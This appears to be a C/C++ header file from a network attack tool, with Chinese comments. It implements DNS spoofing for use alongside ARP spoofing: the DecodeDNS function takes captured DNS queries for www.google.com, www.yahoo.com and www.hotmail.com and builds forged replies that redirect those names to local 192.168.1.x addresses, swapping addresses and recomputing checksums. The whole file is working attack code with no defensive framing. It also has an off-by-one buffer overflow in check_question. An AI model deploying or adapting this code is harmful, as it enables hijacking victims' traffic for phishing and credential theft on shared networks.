as_dns.h

实现了在arp欺骗环境下

#ifndef __AS_DNS_H__
#define __AS_DNS_H__

#include "as_packet.h"

//回答
#define GOOGLE	0x0101A8C0	//192.168.1.1
#define HOTMAIL	0x0401A8C0	//192.168.1.4
#define YAHOO	0x0301A8C0	//192.168.1.3

//查询问题（长度不定）
BOOL check_question(char* src, char* dst)
{
	char format_dst[1024] = {0};
	char seps[2] = {0x2e};
	char *token = NULL;

	char *str = new char[strlen(dst)];
	memcpy(str, dst, strlen(dst));
	str[strlen(dst)] = '\0';

	token = strtok( str, seps);

	int len = 0;
	while (token != NULL) {
		format_dst[len] = strlen(token);
		len += 1;
		memcpy(format_dst+len, token, strlen(token));
		len += strlen(token);
		token = strtok( NULL, seps);
	}
	format_dst[len] = 0;
	
	if(memcmp(src, format_dst, len) == 0) {
		return TRUE;
	}
	return FALSE;
}

//根据DNS请求，伪造DNS回应数据
BOOL DecodeDNS(const u_int8 *pkt_data, u_int32 pkt_len, u_int8* snd_buf, u_int32 snd_len)
{
	char answer_buf[16] = {0};
	*(u_int16*)(answer_buf) = 0x0cc0;
	*(u_int16*)(answer_buf+2) = 0x0100;
	*(u_int16*)(answer_buf+4) = 0x0100;
	*(u_int32*)(answer_buf+6) = 0x2a020000;
	*(u_int16*)(answer_buf+10) = 0x0400;

	if(check_question((char*)(pkt_data+54), "www.google.com")) {
		*(u_int32*)(answer_buf+12) = GOOGLE;
	}
	else if(check_question((char*)(pkt_data+54), "www.yahoo.com")) {
		*(u_int32*)(answer_buf+12) = YAHOO;
	}
	else if(check_question((char*)(pkt_data+54), "www.hotmail.com")) {
		*(u_int32*)(answer_buf+12) = HOTMAIL;
	}
	else return FALSE;

	int questlen = pkt_len-54;		//问题长度

	ETHeader *eh;
	IPHeader *ih;
	UDPHeader *uh;
	DNSHeader *dp;

	eh = (ETHeader *) snd_buf;
	ih = (IPHeader *) (snd_buf + 14);	//定位IP头的位置,14为以太头的长度
	uh = (UDPHeader *) (snd_buf + 14+20);		// 定位UDP的位置
	dp = (DNSHeader *) (snd_buf + 14+20+8);	//定位DNS的位置
	
	memcpy(snd_buf, pkt_data, pkt_len);   //拷贝抓的包到发的包里面因为有很多不需要改的地方，其中包括最重要的DNS  ID号

	memcpy(eh->dhost, pkt_data+6, 6);                      //交换MAC地址
	memcpy(eh->shost,pkt_data, 6);

	ih->ipLength = htons(snd_len-14);    //
	ih->ipID = ih->ipID+1;
	ih->ipFlags = htons(0x4000);	//不分段	
	ih->ipTTL = 0xf4;	//TTl=244
	ih->ipChecksum = 0x00;	//IP效验和先置0以后再算
	ih->ipSource = *(u_int32*)(pkt_data+30);	//交换IP
	ih->ipDestination = *(u_int32*)(pkt_data+26);	//交换IP
	ih->ipChecksum = checksum((u_int16*)ih, 20);
	
	uh->sport = *(u_int16*)(pkt_data+36);//交换端口
	uh->dport = *(u_int16*)(pkt_data+34);//交换端口
	uh->udp_len = htons(snd_len-34);	//填入计算的UDP数据包长度
	uh->cksum = 0;
	
	dp->QR = htons(0x8180);		//无错误标准回复
	dp->QDCount = htons(0x0001);
	dp->ANCount = htons(0x0001);
	
	memcpy(snd_buf+pkt_len, answer_buf, 16); //转向的IP
	ComputeUdpPseudoHeaderChecksum(ih, uh, (char*)(snd_buf+42), snd_len-42);

	return TRUE;
}

#endif